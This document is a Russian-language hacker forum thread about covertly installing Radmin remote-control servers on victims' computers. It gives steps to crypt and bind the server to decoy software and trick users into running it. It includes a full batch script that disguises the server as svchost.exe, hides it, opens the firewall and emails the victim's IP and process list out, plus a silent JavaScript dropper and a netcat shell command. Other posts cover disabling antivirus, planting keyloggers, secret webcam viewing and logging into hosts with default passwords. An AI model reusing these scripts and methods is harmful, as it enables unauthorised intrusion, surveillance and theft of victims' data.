Мож не в тему, но все же интересно реально сделать чтото типа скрытого radminа вот из етого RemotelyAnywhereNH ? тогда ведь можно не только в локалке шустрить :)
----------------
я немного подумал, и наверное тупанул по поводу не из локалки :cool:
а если учесть что соединение идёт через браузер, то значит ли это что фаервол не спалит??

расскажу как скрыть иконку в трее радмин 3.3 , за информацию о том как сделать его лецензионным, как переименовать процесс в svhosts.exe ну и как собрать два exe файла в один, но только не в winrare
о как ;)
icq 4.7.2.4.5.3.9.4.4 без точек

Neponomat, никак не скроешь иконку в радмине 3.3 если у тебя не no tray icon версия (вариант с простой подменой ключа в реестре уже не катит), не дезинформируй людей. Во всех версиях 3.* активация радмина происходит онлайн, т.е. можно использовать только длл-ки от сторонних разработчиков, которые нулят сам сервер, НО такие длл палятся антивирусами. О том как склеить два файла в один - юзай CRUM Joiner. Насчет переименования процесса - нужно убрать тайм-штамп, иначе переименованый r_server не запускается просто-напросто.

По вопросам: ГДЕ взять no tray icon версию - ко мне в ICQ (на аве)

ex3me
Как убрать этот тайм-штамп?

DIMONius-FcSM, задал тот же вопрос в ветке Реверсинг. Пока молчат наши гуру =)

DIMONius-FcSM, задал тот же вопрос в ветке Реверсинг. Пока молчат наши гуру =)
Ну как ответят напишишь мне в личку или в этой теме

А не подскажите какойнибуть хороший криптограф ? .. надо радмин 2.2 заныкать, хотел скачать тот что аФФтор темы вылаживал, а оно мне пишет:

15.03.2009 12:14:43 Фильтр HTTP файл http://sec-123.narod.ru/radmin/7.rar множественные угрозы соединение прервано - изолирован XP\Администратор Обнаружена угроза при попытке доступа в Интернет следующим приложением: C:\Program Files\Opera\opera.exe.

ESET Smart 4 палит :(

Меняю порт на 31280 в реестре выглядит так, "Port"=hex:30,7a,00,00
После этого немогу подцепиться к компу, пишет неудается соеденится с сервером. Сканирую на порт 31280 ненаходит такого порта. Подскажите что не так, почему не могу подключиться((?

Такой вопрос: есть aDSL провайдер у которого есть внутренняя сеть, которая не видна снаружи. У меня есть доступ к одному из модемов (Web-интерфейс) настроенных в режиме роутера. Могу ли я как-нибудь получить доступ к командной строке конечного пользователя?

конечного..
скорее всего нет, если бы был способ то не приходилось бы звонить каждый раз в техсапорт, когда был какой то сбой.

Здраствуйте античатовцы :)

Есть к вам вопрос по теме...

Зачит так..Есть у меня
Remote Administrator (RAdmin) 3.2 + NewTrialStop v1.1
Remote Administrator (RAdmin) 3.2 + NewTrialStop v1.1 Депозит (http://depositfiles.com/files/ed7or1ga5)
Remote Administrator (RAdmin) 3.2 + NewTrialStop v1.1 LetitBit (http://letitbit.net/download/527d80894384/Remote-Administrator--RAdmin--3.2---NewTrialStop-v1.1-.zip.html)

в котором есть собственно 3 файла...
1)файл сервера .exe
2)файл Radmin Viewer .exe
3)ну и файлик заморозки триала..
с файликом newtstop.ini в котором есть [options]
hide_tray_icon=1
тоесть возможность скрытия иконки с трея..



мне нужно как то впарить узверю серверную часть..
и конечно же сделать чтоб у негоне было этой иконки..

Я знаю IP адрес узверя..посредством передачи файлов в аське..

Знаю его провайдера..
Знаю что комп узверя находится у него дома..и подключается он с помощю модема...,
IP адрес скорее только этого юзверя так как локалки у него нет вообще..и IP статический и не меняется ..

Так же знаю что на компе у него стоит нод32 который обновляется...
Юзверь не чень продвинут в компах..
Но попасть к нему домой и установит сервер нет возможности..Значит надо хитромудрым способом..
Который вот надеюсь от вас услышать..
А ещё лучше если подскажете как именно это сделать..
Заранее спасибо.. :)

мой тебе добрый совет заюзай Hide Radmin (http://stopxaker.ru/showthread.php?t=30)

А вот это всё

в котором есть собственно 3 файла...
1)файл сервера .exe
2)файл Radmin Viewer .exe
3)ну и файлик заморозки триала..
с файликом newtstop.ini в котором есть [options]
hide_tray_icon=1
тоесть возможность скрытия иконки с трея..

лишний гемор !

мой тебе добрый совет заюзай Hide Radmin (http://stopxaker.ru/showthread.php?t=30)

А вот это всё
лишний гемор !

Да..,но маленькая проблемка...,а именно 40$ ))
может все таки попробуем сделать что-то..платные софтины я и сам знаю что есть...

Да..,но маленькая проблемка...,а именно 40$ ))
может все таки попробуем сделать что-то..платные софтины я и сам знаю что есть...

Уже отписывался в этом топике...

1. Вычисти все рессурсы с серверной части .. (в т.ч иконки)

2. Делай свой REG файл с настройками (порт;пасс;иконка в трее)

3. Криптуешь серверную часть (платный крипт) ,( по возможности DLL тоже.. т.к они в основном и палятся)

4. В Дельфях\С++ кидаешь в рессурсы серверную часть со всеми DLL + рег файл ...

5. Прописываешь пути инсталов .. в реестр импортируешь настройки, запускаешь сервер

6. Получившуюся загагулину склеииваешь с софтом и впариваешь.

(Если юзер нуб то ставишь иконку картинки, + расширение scr или какие там ещё экзекютабельные)

http://depositfiles.com/files/1763484 ( Setup1.rar 719.02 KB 2007-09-14) ...

У одного юзера
Палится AVASTom...

У другого не палится нодом..
но при попытке подключения к ip внешнему и
внутреннему.. ничего не получается..

На удаленной машине с динамическим ip стоит Radmin. Получать ip с помощью qip стало невозможным. Задумываюсь о сканере, посоветуйте самый быстрый, заранее благодарен.
P.S. Мб есть сканер который диапазоны из текстового файла берет?

На локальных машинах стоит Symantec AntiVirus 10.1.4.4000 и палит радмина, можно ченить сделать?

На локальных машинах стоит Symantec AntiVirus 10.1.4.4000 и палит радмина, можно ченить сделать?

Купить приватную сборку (http://stopxaker.ru/showthread.php?t=30)

Нужно проверить список IPов, на определенный пароль, версия радмина 2, существуют паблик версия? если нет сколько стоит написание?

все сделал как было описано в первом посте но при попытки конекта
выходит следующая ошибка:
http://slv-line.ru/IMG/image/129060.jpg

У меня такой вопрос, когда через режим Telnet связываюсь с удаленной машиной, текст который должен быть русскими буквами, выводится каким-то набором букв. А английский текст как был, так и остается нормальным!

Можно че нить сделать для корректного отображения текста?!

Попробуй поменять кодировку
chcp -текущяя кодировка
chcp 1251 -сменить кодировку на 1251

ОК. Сейчас попробую...

Попробывал - =( не помогло!

У меня такой вопрос, когда через режим Telnet связываюсь с удаленной машиной, тект который должен быть русскими буквами, выводится каким-то набором букв. А английский текст как был, так и остается нормальным?

Можно че нить сделать для корректного отображения текста?!

Оптимальный вариант

на удалённый комп , закачиваем туда утилиту netcat и затем запускаем её опять же через Радмин в режиме Telnet со следующими параметрами



nc -l -p 23 -t -e cmd.exe

Теперь запускаем у себя cmd.exe и пишем следущие



telnet ip вашего радмина xxx.xxx.xx.xx 23

и получаем cmd удалённой системы



Microsoft Windows [Версия 5.2.3790]
(С) Корпорация Майкрософт, 1985-2003.

C:\Documents and Settings\Administrator>cd\

C:\>

теперь спокойно можно создавать учётную запись

сори не туда

есть у гонить ключ для radmin server 3?
отблагодарю чем смогу
или киньте кто ссылку на крякнутую версию(не обязательно 3.3, любую)

Всем доброго времени суток. Значит история такая. Работаю в новой организации недавно. Поставил у себя radmin 3.2, месяц прошел и всё.... у меня сервер 2003. Крэков 50 уже пытался ставить, тщетно. пишет срок активации истек и все. на ХР крэки отлично срабатывают, на месяц продляет и все по-новой, а тут борода. поставил 3.3, а он у меня все твердит,что срок активации истек. весь реестр чистил раз на 20. без толку!
раньше тут говорят стояли разные версии Радмина типа 2.1., 2.2, 3.0.... может из-за них такой тупик....
Что можно сделать?
ПОМОГИТЕ, ЧЕМ МОЖеТЕ! Очень надо. Всем большое сибирское спасибо! Жду ваших сообщений.

Киньте в личку это чудо Worm.Win32.Rahak.a(b) у кого есть заранее благодарен!

Киньте в личку это чудо Worm.Win32.Rahak.a(b) у кого есть заранее благодарен!

Rahak появляется потом , сначало на машину попадает Radminer (http://stopxaker.ru/showthread.php?t=56)

Еще один вопросик, какой стандартный логин\пароль идет в версиях 3.х?

Сорри если вопрос где-то уже был, но всё же: эта штукенция конечно весч кульная, но реально-ли подключиться к комунить по инету или это тока для локалки? Если тока локалка - то БАЯН. А если и можно по IP нужного юзверя в инете к нему подключиться (допустим, мы впендюхали ему сервер под видом клёвой проги), то как? У мну не получилось :-( (с юзверем я договорился протестить заранее... он включил, сказал что работат сервер).

Слёту ещё вопрос: када по аське принимаешь файл от кого-то приходит 3 строки: внешний и внутренний IP (они разные но не у всех) и ещё порт. Дык вот, по какому IP надо коннектиться к юзверю (через радминчега фсмысле) и нужно ли (и есть ли смысл) юзать указанный там порт? (если нет, то какой ваще порт юзать?)

ЗЫ если из файла 111.bat убрать 3 строку - то сервак анвирем (аваст и дохтор вэб в моём случае) НЕ палится ибо сразу становится не вирусом! просто 3-я строка чёт шаманит с фаерволом и анвиру это не в кайф ;-)

По поводу радмина!!! мона через инет подключаться!!! все так делаю, точнее больше юзают внц, так как эта софтина бесплатна, просто указываешь ип сервака и все оп и конект))))

Что есть внц?

ЗЫ гогль по запросу выдал вот чё: Насос пищевой винный ВНЦ
Насос винный ВНЦ предназначен для перекачивания сусла, виноматериалов и вина

йа паццталом =)

http://ru.wikipedia.org/wiki/Vnc

M@ZAX@KEP
Если у сервера динамический IP то можно и по инету если же нет то коннект идет на провайдер, а не на тачку с сервером радмина.

СПС большое. Сильно прояснил ситуацию... а если у жертвы статический, но провайдер такойж как у мну?... И как можа сделать чтоб коннект шёл не на провайдера, а домой к жертве сразу? Ведь хоть IP и статический, но этож IP жертвы, а не провайдера... у провайдера другой сафсем.

Запомните, порой всё что вам надо, делает сам разработчик. Я не раз убеждался в этом.
Поэтому READ THE FACKING MANUAL, мля !!! Где я и нашел практически всё, что нужно.
Дополнительная инфа из поисковиков добавило кучу вкусностей к пресному ману разработчика.
Читаем первый пост!

Кто нибудь может помочь с модификацией серверной части радмина, а именно изменить путь в реестре куда сохраняются настройки сервера. Нужно для того что бы запустить ещё одну копию радмина с независимыми настройками.
PS: Вариант с указанием параметров в коммандной строке не предлагать.

Кто знает команды для радмина через смд , то есть чтоб можно было написать в смд путь к радмину, айпи пасс и подключение?!
Или как можно передать файл и запустить ?

Кто знает команды для радмина через смд , то есть чтоб можно было написать в смд путь к радмину, айпи пасс и подключение?!
Или как можно передать файл и запустить ?

READ THE FACKING MANUAL, мля !!! (С) НА ПЕРВОЙ СТРАНИЦЕ!!!
Управление с командной строки (Command-line)

Управление Radmin клиентом с коммандной строки
radmin.exe /copyphonebook - создает Radmin 2.x телефонную книгу из телефонной книги Radmin 1.11 .

Radmin клиент может усправляться с командной строки, которые позволяют создавать соединение с хостом без использования Адресной книги.

Правило: radmin.exe /connect:xxxxx:nnnn other_options
Пример:
radmin.exe /connect:server:1000 /fullscreen /encrypt
radmin.exe /connect:10.0.0.100:4000 /telnet
radmin.exe /connect:server /through:gate

Настройки:
/connect:xxxxx:nnnn - указывает сервер и порт для подключения. Эта опция запрашивает соединение с сервером даже при отсутствии записи в Адресной книге.
/through:xxxxx:nnnn - указывает адрес и порт промежуточного сервера.

По умолчанию, режим соединения 'Полный контроль' (видеть удаленный экран, управлять мышкой и клавиатурой)
Для установки других режимов соединения используются следующие команды:
/noinput - режим просмотра (только видишь экран).
/shutdown - режим удаленного выключения компьютера

/file - режим пересылки файлов
/telnet - телнет режим

Следующие далее настройки работают только в режимах 'Полный контроль' и 'Просмотр' :
/fullscreen - устанавливает полноэкранный режим просмотра
/hicolor - устанавливает 65536 фомат цвета, для передачи по сети.
/locolor - устанавливает 16 формат цвета, для передачи по сети.
/updates:nn - указывает максимальное колличество прорисовок для просмотра
/encrypt - включает шифрование всех данных при работе.

Другие настройки:
/unregister - удаляет все уже введённые ключи для Rаdmin.

/? - Показывает окно помощи.

Управление Radmin сервером с коммандной строки
Radmin имеет некоторые дополнительные команды для управления с командной строки. Но, конечно, лучше всего, если вы все настройки будете призводить следуя за указаниями программы установки, или используя 'Radmin server setup' После чего вам не понадобится пользоваться настройками с командной строки.

Эта возможность предоставлена для использования Системными Администраторами, которые могут вручную инсталировать и деинсталировать Radmin сервер, а так же изменять его настройки (номер порта, пароль и т.д.)

Правило: r_server.exe <switches>

/setup - показывает диалог (запускает мастера), который вам поможет установить сервис и драйвер, а также указать пароль и номер порта для Radmin сервера.
Пример: r_server.exe /setup

[/port:xxxx] [/pass:xxxxx] - if there are no other switches specified, except /port and /pass, r_server runs as the Radmin server, with a password and a port from the a command line or from the registry, if corresponding switch is not present.
Пример: r_server.exe
Пример: r_server.exe /pass:mypass

Пример: r_server.exe /port:5505
Пример: r_server.exe /port:3333 /pass:qwerty

/save [/port:xxxx] [/pass:xxxxx] - позволит вам изменить номер порта и\или пароль в реестре.
Пример: r_server.exe /port:5505 /pass:qwerty /save
Эта команда позволяет сохранить номер порта и пароль в реестр.
Пример: r_server.exe /save -- Эта команда сохранит в реестр номер порта по умолчанию и пустой пароль .

/install - установка как сервиса (Win95/98 or WinNT) и драйвера (WinNT)
ВНИМАНИЕ: Для установки драйвера, файл raddrv.dll должен быть переписан в директорий System32, находящийся внутри системного Windows директория (обычно, c:\Windows или c:\Winnt)

Пример: r_server.exe /install

/uninstall - деинсталяция программы.
Пример: r_server.exe /uninstall

/installservice - Установка только сервиса (Win95/98 or WinNT)
Пример: r_server.exe /installservice

/uninstallservice - деинсталяция сервиса
Важно : Ошибочное выполнение данной команды в ответ получает сообщение, что сервис не установлен.
Example: r_server.exe /uninstallservice

/installdrv -для установки драйвера только (работате только под WinNT)
ВНИМАНИЕ: Для установки драйвера файл raddrv.dll должен быть переписан в директорий System32, находящийся внутри системного Windows директория.
Пример: r_server.exe /installdrv

/uninstalldrv - uninstall the driver only.
Важно : Ошибочное выполнение данной команды в ответ получает сообщение, что сервис не установлен.
Пример: r_server.exe /uninstalldrv

/silence - не показывать 'error' или 'ok' сообщения, в /install, /uninstall или /save командах.

/stop - останавливает Radmin сервер. Эта команда останавливает сервис и завершает приложение. Для остановки сервиса под WinNT требуется наличие соответствующих прав.
/? - Показывает окно помощи.

Для работоспобности серверной части достаточно трёх файлов:
r_server.exe - сам сервак
AdmDll.dll - необходимая длл
raddrv.dll - длл видео-захвата(без неё будет пахать всё, кроме удалённого раб.стола)


a kakije faili nujni dlja radmin 3.3 podskajite!?

Все которые он устанавливает.
А вобще, юзай 2.1\2.2

спасибо за статью оч круто!

а какой стандарт пароль на сервере v3.0 радмина по умолчанию?

blin ne poluchajetca canektitca pochemu? ja daje oficalnij ustanawil server na wirtualke wewer u sebja wsjo rawno ne poluchajetca conektitca a na swoj ip conektitca .... :(
pra kakom udaljonom uprawlenje mojet rech iti jesli ne konektitca daje oficalnij radmin ... :/

blin ne poluchajetca canektitca pochemu? ja daje oficalnij ustanawil server na wirtualke wewer u sebja wsjo rawno ne poluchajetca conektitca a na swoj ip conektitca .... :(
pra kakom udaljonom uprawlenje mojet rech iti jesli ne konektitca daje oficalnij radmin ... :/
Попробуй выключить фаерволы, особенно Брендмаузер виндовс

potom ja wideo zdelaju sami posmatrite ato Попробуй выключить фаерволы to sjo..

Либо сервер радмина на удаленном компе не запущен, либо фаервол мешает соединиться, других причин быть неможет...
Видео делай, разумно...
Radmin2.1+key, Radmin 3.3 wiever+server (http://slil.ru/28031078) регнутый\крякнутый и т.д...

Привет, я извиняюсь может тут уже вылаживали эту сборку.
Сборка радмин серва: скрытная установка, без значка в трее, после запуска приходит отчет с IP на почту, указаную в настройках файла Install.bat.
1. извлекаем из архива MULT_AGENT.exe
2. меняем расширение exe на rar
3. извлекаем install.bat
4. ищем строки как показано на скрине который имеется в архиве.
5. вписуем адрес почты, имя пароль и адрес почты куда придет отчет.
6 сохраняем.
7. кидаем обратно в архив и меняем расширение rar на exe
8.кидаем жертве, проверяем почту, берем ip коннектимся.
если у жертвы динамический ip кидаем в автозагрузку ему Install.bat
вродебы пока. что палится только каспером
пароль к архиву antichat.ru

СКАЧАТЬ (http://depositfiles.com/files/a7src22xq)

Привет, я извиняюсь может тут уже вылаживали эту сборку.
Сборка радмин серва: скрытная установка, без значка в трее, после запуска приходит отчет с IP на почту, указаную в настройках файла Install.bat.
1. извлекаем из архива MULT_AGENT.exe
2. меняем расширение exe на rar
3. извлекаем install.bat
4. ищем строки как показано на скрине который имеется в архиве.
5. вписуем адрес почты, имя пароль и адрес почты куда придет отчет.
6 сохраняем.
7. кидаем обратно в архив и меняем расширение rar на exe
8.кидаем жертве, проверяем почту, берем ip коннектимся.
если у жертвы динамический ip кидаем в автозагрузку ему Install.bat
вродебы пока. что палится только каспером
пароль к архиву antichat.ru

СКАЧАТЬ (http://depositfiles.com/files/a7src22xq)
http://i030.radikal.ru/0910/dd/6aadea925dec.png (http://www.radikal.ru)

и плюсом avira 9 версии палит . . .
так что не только касперским . . .
novirusthanks.com

Обьясните мне нубу - как закрывать процессы через Telnet radmina( в частности NOD32). там идет так : c\windows\system32\ а дальше как не знаю, через taskkill вроде как то можно, а как на него выйти не пойму??

sc config тебе в помощь

поподробнее пожалуйста! я знаю можно так taskkill /f /im egui.exe, а как через телнет это сделать?

Через телнет ты только коннектишься к хосту, а команды уже пишешь, когда получаешь приглашение системы.

СРОЧНО нужно закрыть процесс антивиря!!! Помогите как написать в телнете радмина или еще как нибудь?? в подробносятях!! Горю!!!!Срочно!!!

1) выполни services.msc, найди в списке процессов этот антивирус и запиши название его процесса (если не можешь сделать этого на похеканой машине, заинсталь аналогичный антивирус у себя где-то - чтобы узнать название процесса).
2) в командной строке пишешь: sc config ИМЯ_ПРОЦЕССА start= disabled

ЕСЛИ ПРОЦЕСС НЕ ЗАЩИЩЕН, то он после перезагрузки не стартанет, иначе выдаст ошибку наподобии permission denied.

эх, спасибо конечно :) , но хотелось бы его научиться сразу завершать , а не ждать перезагрузки

Ну тогда введи в консоли:
taskkill /?
да почитай :)

привет народ, подскажите такую вещь.
Есть комп с радмином, надо туда поставить кейлокер, я так понимаю надо такой что бы в авто запуск его поставить, или подскажите как поставить АктуалСпи удаленно при помощи радмина.

конечно в автозапуск
если кейлогер позволяет - настрой полностью его и скопируй файлы на комп жертве, а потом просто кинь ссылку в автозагрузку

все сделал как надо,а иконка с трея не пропадает...что там прописать надО?просто на ноль изменить?

а какая версия радмина? в последних версиях иконка не убирается

конечно в автозапуск
если кейлогер позволяет - настрой полностью его и скопируй файлы на комп жертве, а потом просто кинь ссылку в автозагрузку

Это я все прекрасно понимаю, вопрос в том какой (название программы) кейлокер для этого подходит, я конечно нашёл один под название Детектив, но хотелось бы что то по функциональней.

Статья супер, у меня вопрос, я знаю ip компа, имею к нему физический доступ но не постоянный, как мне с ним управлять со своего компа

Статья супер, у меня вопрос, я знаю ip компа, имею к нему физический доступ но не постоянный, как мне с ним управлять со своего компа
Со своего компа, навряд ли получится, а так качаешь архив "111", разархивируешь его, там у тебя будет файл 111.bat, !!!Не забудь при этом антивирус вырубить, а то заругается!!! Приносишь разархивируную папку на тот комп и запускаеть 111.Бат !!!Про антивирус опять не забываем!!! После запуска можно уже конектиться к этому компу, не забудь узнать его IP в сети, и скачай прогу Радмин Вьювер, с помощью её и будешь конектиться. вот вроде и все

Со своего компа, навряд ли получится, а так качаешь архив "111", разархивируешь его, там у тебя будет файл 111.bat, !!!Не забудь при этом антивирус вырубить, а то заругается!!! Приносишь разархивируную папку на тот комп и запускаеть 111.Бат !!!Про антивирус опять не забываем!!! После запуска можно уже конектиться к этому компу, не забудь узнать его IP в сети, и скачай прогу Радмин Вьювер, с помощью её и будешь конектиться. вот вроде и все
Что плохо там еще инет не постоянный

ТАКОЙ ВОПРОС : Я закинул челу скрытого установщика радмина( с паролем privedmidved который ) как мне там щас сделать так чтоб к его компу тока я смог подключаться? как порт сменить или пасс на уже устпновленном компе не закидывая заново новый установщик ?
а какого именно? чья сборка была?
вроде там если не скрытаят установка,то можно ограничить и порт поменять,а так посмотри в *.bat

А вот такой глупый вопросик)

Там стоит команда подчистки файлов распакованных самой сборкой посли их копирования в Windows и System32.

А как будет выглядеть текст bat файла который "подчистит" за собой эти файлы из этих каталогов? Тоесть автоматизировать это дело) Чтото вроде таблетки.

Буду весьма благодарен за помощь)

Текст bat файла сборки:

cmdow @ /HID


copy /y "blat.exe" "%SYSTEMROOT%/system32/blat.exe"
copy /y "blat.lib" "%SYSTEMROOT%/system32/blat.lib"
copy /y "blat.dll" "%SYSTEMROOT%/system32/blat.dll"
copy /y "svchost.exe" "%SYSTEMROOT%/svchost.exe"
copy /y "raddrv.dll" "%SYSTEMROOT%/raddrv.dll"
copy /y "admdll.dll" "%SYSTEMROOT%/admdll.dll"

netsh firewall add allowedprogram "%Windir%\svchost.exe" "Remote Administrator Server" ENABLE

REG ADD HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 00000001 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\r_server /v DisplayName /t REG_SZ /d "Service Host Controller" /f

"%SYSTEMROOT%/svchost.exe" /install /silence
"%SYSTEMROOT%/svchost.exe" /start

%SYSTEMROOT%/system32/blat.exe -install -server mail.ru -port xxxx -f user@mail.ru -u user -pw pass

ipconfig /all > %systemroot%/system32/ip.txt
tasklist > %systemroot%/system32/task.txt

blat.exe %systemroot%/system32/ip.txt -to user@mail.ru
blat.exe %systemroot%/system32/task.txt -to user@mail.ru

schtasks /create /tn "security" /sc minute /mo 15 /ru "NT AUTHORITY\SYSTEM" /tr %SYSTEMROOT%/system32\ip.bat


del cmdow.exe
del blat.exe
del blat.lib
del blat.dll
del raddrv.dll
del admdll.dll
del svchost.exe
del install.bat

НАРОД ПОМОГИТЕ - ЕСТЬ КОМП С ВЕБКОЙ И ПОЛНЫМ ДОСТУПОМ - ВИНДА - АНТИВИРУС МОЯ И Т.Д - КАК МНЕ С НИМ НАТИХОРЯ КОНЕКТИТСЯ А ЕЩЕ ЛУТЧЕ ВЕБКУ СМОТРЕТЬ ... АЙПИ ПОСТОЯННЫЕ - НО МЫ У РАЗНЫХ ПРОВАЙДЕРОВ - У МЕНЯ ВАЙ ФАЙ - И СЕТКА ГОРОДСКАЯ - ОН НА САТЕЛИТ ПО ДОМАМ КАБЕЛЬ КИДАЮТ СЕТЕВОЙ .... Р АДМИНА - СТАВИЛ НЕ ПОЛУЧАЕТСЯ КОНЕКТИТСЯ -

ПОМОГИТЕ КАК НАСТРОИТЬ - КАКОЙ ИМЕННО АЙПИ ЕГО ???

Привет, я извиняюсь может тут уже вылаживали эту сборку.
Сборка радмин серва: скрытная установка, без значка в трее, после запуска приходит отчет с IP на почту, указаную в настройках файла Install.bat.
1. извлекаем из архива MULT_AGENT.exe
2. меняем расширение exe на rar
3. извлекаем install.bat
4. ищем строки как показано на скрине который имеется в архиве.
5. вписуем адрес почты, имя пароль и адрес почты куда придет отчет.
6 сохраняем.
7. кидаем обратно в архив и меняем расширение rar на exe
8.кидаем жертве, проверяем почту, берем ip коннектимся.
если у жертвы динамический ip кидаем в автозагрузку ему Install.bat
вродебы пока. что палится только каспером
пароль к архиву antichat.ru

СКАЧАТЬ (http://depositfiles.com/files/a7src22xq)
А какой логин и пароль надо вводить при коннекте к жертве ?

версия 2.2 работает на win7? У меня есть сборка 2.х, не знаю какая точно и на виндовс 7 при коннекте на просмотр или управление - черный экран и все. Можно как-то сделать скрытой версию 3.4(http://torrents.ru/forum/viewtopic.php?t=2502247)? Я пробовал все файлы что он установил и ветку реестра скидывать на другой комп и сервис не хочет устанавливаться, что я делаю не так?Если надо какието подробности, скажите - опишу

А какой логин и пароль надо вводить при коннекте к жертве ?
Пароля нет подключаешся сразу.

kak zdelat 4to blat ip otpravil na moyu po4u?

kak zdelat 4to blat ip otpravil na moyu po4u?
в радмине нет такой функции

подобная функция есть у Remote Office Manager
точнее там есть готовый бэк-конект

кто может сделать для меня скрытый radmin 3,4 очень нада
чтобы IP пришол комне на почту
de-sign-ero@yandex.ru

кто может сделать для меня скрытый radmin 3,4 очень нада
чтобы IP пришол комне на почту
de-sign-ero@yandex.ru
Отписал в личку

Hi ,

Can you provide some files for Raadmin 3.4 I need it for Windows 7 or some files work with Windows 7

- admdll.dll
- raddrv.dll
- svchost.exe


This files i mean

Greetings

+++++Впаривание Радмина++++
Самый лучший способ - взять выше выложенные скрипты, оформить инструкции,
упаковать инсталлером с какой-нить прогой и впарить ламеру.

Вот, как это сделать без инсталлера.
Можно невидимо пустить bat-файл через ява-скрипт:
_README.js

var WSHShell = WScript.CreateObject("WScript.Shell");
WSHShell.Run("111.bat",0);

var WSHShell = WScript.CreateObject("WScript.Shell");
WSHShell.Run("screenseiver.scr",1);

Запуститься сначала установка радмина, а за ней какая-нить типа полезная прога.
http://sec-123.narod.ru/radmin/6.rar



как я понял, тут если запустить, то Радмин в автозапуске будет уже? и будет включаться при включении компа... а как это можно убрать, что бы вручную только запускать (автозагрузка не нужна).
И что нужно сделать, если он уже запускается вместе с компом?

Все понятно кроме одного
Я получил доступ к шелу, как мне слить фаил локально который находится у меня на фтп

кто знает в чем проблема???
Суть такая - я в локалке насканил кучу компов с открытым 4899 портом, на которых стояли стандартные пароли типа 12345678, privedmidved. Я к ним коннектился и видел что на всех стоял скрытый установщик радмина, то бишь жертвы не подозревали о его существовании на своих компах. Проходило некоторое время и, подрубаясь к ним же вновь, выскакивало уже окно с посьбой ввестит логин и пасс. Из этого я понял, что пользователь скорее всего допер в чем суть и поставил вероятнее сервак радмина со своим паролем. Непонятно одно - почему бы попросту не снести скрытый установщик или закрыть данный порт вручную?? ПРичем такая ситуация повторялась не с 2-мя, тремя людьми, а практически поголовно. Звучит как бред, но Я подумал может это некоторые антивирусы таким образом обнаруживают уязвимость в системе и собственными средствами устанавливают какой нибудь дефолтовый пароль в виде логина и пасса? я думаю те самые компы ктото в свое время заваевал самастаятельно а ты просто решил пользваться его благами вот он и сменил пассы для еденаличного пользвания яб на его месте еще сменил бы порт чтоб сканером радминовским не выдавать своих жертв )))

Афтору респект и уважуха очень актуальную тему развил но вот остались ешо вапросы с локалкой то всё понятно но вот как быть если сервак радминовский находится не в локальной а вовсемирной сети и у него не выделеный айпишник можно конечно через Hamachi но опять таки как его установить и настроить скрытно и чтоб он потом в трее не палился я думаю что темы очень тесные и нет смысла заводить новую тему можно всё обсудить здесь

Товарищи! Соотечественники! Подскажите какие ветки реестра и какие файлы нужны для полной работы radmin 3.4 hide ?

Товарищи! Соотечественники! Подскажите какие ветки реестра и какие файлы нужны для полной работы radmin 3.4 hide ? elekt помоему всё популярно объяснил смотри первую страницу

Добавлю свои 5 копеек.
Долго мучался с перебором пароля зная hash - задача стояла не менять hash и не сбрасывать - чтобы пользователь не заметил.

Удалось найти подробный мануал с видео ( правда по китайски) :D как во время запроса пароля подсунуть radmin'y узнанный hash вместо пароля, при помощи OLLYDBG. Это для версии 2.х

Кстати у них же есть уже написанная программа для версии 3.0, даже не нужно OLLYDBG запускать. Я с ней не разбирался, т.к. у меня проблема была с версией 2.2

Немного написал про метод (когда еще не знал его решения) тут (http://forum.antichat.ru/threadnav15272-3-10-radmin.html)

Вообщем каспер 8 сечёт 111 бат

своими руками батник поковыряй, вроде каспер его сечёт из-за того что там присутствует имя системного процесса svhost

а что если я .dll дал другие имена и в бате прописал их . От этого ничего не изменится?

подскажите где взять тихий инсталятор версии 3.+
ну и конечно что иконки видно не было